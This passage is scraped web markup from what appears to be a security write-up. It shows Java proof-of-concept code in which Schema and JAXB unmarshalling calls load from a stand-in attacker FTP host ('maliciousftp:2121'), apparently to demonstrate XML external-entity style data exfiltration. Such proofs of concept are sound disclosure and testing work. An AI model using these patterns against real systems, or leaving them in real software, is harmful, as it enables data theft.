class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">serviceQN<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-17\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-18\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-19\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-21\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p><strong>javax.xml.validation.Schema Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f09d900447033\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.net.MalformedURLException;  import java.net.URL;    import javax.xml.validation.Schema;  import javax.xml.validation.SchemaFactory;    import org.xml.sax.SAXException;    public class NSchema {   public static void main(String[] args) {    SchemaFactory schemaFactory =    SchemaFactory.newInstance(&#8220;http:\/\/www.w3.org\/2001\/XMLSchema&#8221;);    URL url;    try {     url = new URL(&#8220;ftp:\/\/maliciousftp:2121\/schema&#8221;);     try {      Schema schemaGrammar = schemaFactory.newSchema(url);     } catch (SAXException e) {      e.printStackTrace();     }    } catch (MalformedURLException e) {     e.printStackTrace();    }   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-25\">25<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">validation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Schema<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">validation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SchemaFactory<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">org<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SAXException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-9\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NSchema<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">SchemaFactory <\/span><span class=\"crayon-v\">schemaFactory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SchemaFactory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/www.w3.org\/2001\/XMLSchema&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/schema&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Schema <\/span><span class=\"crayon-v\">schemaGrammar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">schemaFactory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newSchema<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">SAXException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-25\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0026 seconds] -->  <\/p>\n<p><strong>javax.xml.JAXBContext Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0a0419148849\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.net.MalformedURLException;  import java.net.URL;    import javax.xml.bind.JAXBContext;  import javax.xml.bind.JAXBException;  import javax.xml.bind.Unmarshaller;    public class UnMarsh {   public static void main(String[] args) {    JAXBContext jaxbContext = null;    try {     jaxbContext = JAXBContext.newInstance();    } catch (JAXBException e) {     e.printStackTrace();    }    URL url = null;    try {     url = new URL(&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;);    } catch (MalformedURLException e) {     e.printStackTrace();    }    Unmarshaller jaxbUnmarshaller = null;    try {     jaxbUnmarshaller = jaxbContext.createUnmarshaller();    } catch (JAXBException e) {     e.printStackTrace();    }    try {     Object test = jaxbUnmarshaller.unmarshal(url);    } catch (JAXBException e) {     e.printStackTrace();    }   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a0419148849-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a0419148849-34\">34<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bind<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JAXBContext<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bind<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JAXBException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bind<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Unmarshaller<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-8\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">UnMarsh<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JAXBContext <\/span><span class=\"crayon-v\">jaxbContext<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jaxbContext<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JAXBContext<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">JAXBException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span 